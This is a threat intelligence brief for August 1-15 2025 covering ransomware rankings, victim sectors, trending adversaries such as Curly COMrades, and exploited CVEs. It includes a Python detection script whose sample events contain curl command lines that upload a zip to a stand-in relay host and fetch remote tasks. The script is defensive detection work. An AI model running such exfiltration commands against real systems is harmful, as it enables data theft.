Executive Summary
Small businesses continue to dominate the ranks of breach victims at 84.25%. Considering that small businesses represent about half of employment globally and about 44% of US GDP, they fall victim to more than their fair share of cyber-attacks. This is a symptom of the fact that many SMBs lag larger enterprises in their security posture and capabilities. Because SMBs lack the financial resources of large enterprises, a cyber breach is also more likely to put one out of business. Smaller businesses must focus on addressing cyber risk: their survival depends on it.
Report Links
Download Threat Brief For August 1-15 2025
Top Ransomware
Ransomware | Percentage | Previous | Change |
---|---|---|---|
Qilin | 0.200787 | 0.131 | remains at #1 |
Akira | 0.141732 | 0.0992 | Up from 3 |
PLAY | 0.0748031 | | |
Sinobi | 0.0669291 | | |
BlackNevas | 0.0472441 | | |
Amongst ransomware actors, Qilin has solidified its position in first place, growing from 13% to just over 20% of attacks. Akira has also strengthened its position, moving to number 2 with just over 14% of attacks (up from just under 10%). The remaining positions in the top 5 ransomware actors are taken by new players: PLAY, Sinobi and BlackNevas. BlackNevas, a crypto-ransomware actor also known as Trial_Recovery, while first seen in September 2024, is notable for its recent reappearance after a hiatus of several months.
Victim Sector
Sector | Percentage | Previous |
---|---|---|
manufacturing | 0.165354 | 0.1508 |
financial-services | 0.161417 | 0.1389 |
construction | 0.133858 | 0.1627 |
retail | 0.110236 | 0.1548 |
technology | 0.0826772 | 0.1071 |
Victim Location
Location | Percentage | Previous |
---|---|---|
USA | 0.574803 | 0.5 |
UK | 0.0629921 | 0.0437 |
Germany | 0.0511811 | 0.0357 |
Italy | 0.0433071 | 0.0397 |
Canada | 0.0314961 | 0.0357 |
Trending Adversaries
- Curly COMrades
- Linen Typhoon
- ShinyHunters
- Storm-2603
- Violet Typhoon
Among trending adversaries, Curly COMrades is worth noting: it is an APT group with apparent links to the Russian Federation. The name “Curly COMrades” is derived from their use of curl.exe for Command and Control (C2) communications and data exfiltration. Their main targets appear to be in Eastern Europe, particularly organizations in the EU-aspirant nations Moldova and Georgia. Once they infiltrate a network, they set up multiple reverse proxy tunnels to relays under their control. These tunnels are ultimately used to exfiltrate data, apparently for espionage purposes. Indicators of Compromise and TTPs are listed in Bitdefender’s report and can be used to create detection rules. While targets are currently primarily in Georgia and Moldova, Russian groups are notorious for targeting any country that supports Ukraine.
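As a starting point for such a detection rule, the Python below (an added example, not taken from this brief or from Bitdefender's report) flags curl.exe process launches that contact hosts outside an allowlist and raises the severity when an upload option is present. The allowlist, host names and sample events are constructed assumptions; real indicators should come from Bitdefender's report.

```python
import ntpath
import shlex
from urllib.parse import urlsplit

# Real curl options that send local data to the remote side.
UPLOAD_LONG = {"--upload-file", "--form", "--data", "--data-binary", "--data-raw"}
UPLOAD_SHORT = {"-T", "-F", "-d"}
# Assumption: destinations this environment expects curl.exe to contact.
ALLOWED_HOSTS = {"updates.corp.example"}

# Constructed process-creation records (image, command line); not real telemetry.
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\curl.exe",
     r"curl.exe -s -o C:\Temp\agent.msi https://updates.corp.example/agent.msi"),
    (r"C:\Windows\System32\curl.exe",
     r'curl.exe -k -T "C:\Users\Public\out data.zip" https://relay.example.net/u'),
    (r"C:\Windows\System32\curl.exe", r"curl.exe -s http://203.0.113.10/tasks.txt"),
    (r"C:\Windows\System32\cmd.exe", r"cmd.exe /c whoami"),
]

def analyze(image, cmdline):
    """Return a finding for a curl.exe launch to a non-allowlisted host, else None."""
    if ntpath.basename(image).lower() != "curl.exe":
        return None
    # posix=False keeps Windows backslashes intact; quotes are stripped by hand.
    tokens = [t.strip('"') for t in shlex.split(cmdline, posix=False)][1:]
    hosts, uploads = [], []
    for tok in tokens:
        if tok.lower().startswith(("http://", "https://", "ftp://")):
            hosts.append(urlsplit(tok).hostname)
        elif tok in UPLOAD_LONG:
            uploads.append(tok)
        elif tok[:2] in UPLOAD_SHORT:
            # Covers "-T file" and "-Tfile"; clusters like "-sT" are not unpacked.
            uploads.append(tok[:2])
    unknown = [h for h in hosts if h not in ALLOWED_HOSTS]
    if not unknown:
        return None
    return {"hosts": unknown, "upload_flags": uploads,
            "severity": "high" if uploads else "medium"}

def scan(events):
    """Run analyze() over (image, cmdline) pairs and keep only the findings."""
    return [f for f in (analyze(i, c) for i, c in events) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

URLs given to curl without a scheme are not matched by this check, so a production rule should also inspect network telemetry for the curl.exe process.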
Trending & Actively Exploited Vulnerabilities
CVE | Vendor | Product |
---|---|---|
CVE-2020-25078 | D-Link | DCS-2530L and DCS-2670L Devices |
CVE-2020-25079 | D-Link | DCS-2530L and DCS-2670L Devices |
CVE-2022-40799 | D-Link | DNR-322L |
CVE-2025-25256 | Fortinet | FortiSIEM |
CVE-2025-53786 | Microsoft | Exchange |
CVE-2025-54948 | Trend Micro | Apex One |
Vulnerabilities that warrant attention include 3 affecting D-Link equipment and dating back to 2020 and 2022 (CVE-2020-25078, CVE-2020-25079, CVE-2022-40799). Of particular concern is a recently announced high-severity vulnerability in on-premises Microsoft Exchange Server 2019 deployments (CVE-2025-53786). Microsoft strongly recommends that affected organizations promptly apply hotfixes which were provided in April 2025. Organizations with vulnerable systems exposed to the Internet should consider isolating them until they are patched.
Trending Malware
- 4L4MD4R
- EDRKillShifter
- MucorAgent
- Plague
- SparkKitty
- XZ backdoor
Top News
- Critical Zero-Day Bugs Crack Open CyberArk, HashiCorp Password Vaults
- Hacker extradited to US for stealing $3.3 million in crypto
- Microsoft pays record $17 million in bounties
- New 'Shade BIOS' Technique Beats Every Kind of AV
- New Ghost Calls tactic abuses Zoom and Microsoft Teams
- ShinyHunters Tactics Now Mirror Scattered Spider
- SonicWall urges admins to disable SSLVPN amid critical bug
- Over $300 million in cybercrime crypto seized by DOJ
Contributors
Written by Jeremy Nichols, former Director Of The Global Threat Intelligence Center
Executive Summaries & Adversary Bios by Geoff Rehmet, Cybersecurity Expert
Produced & Distributed By Phish Tank Cybersecurity Marketing Division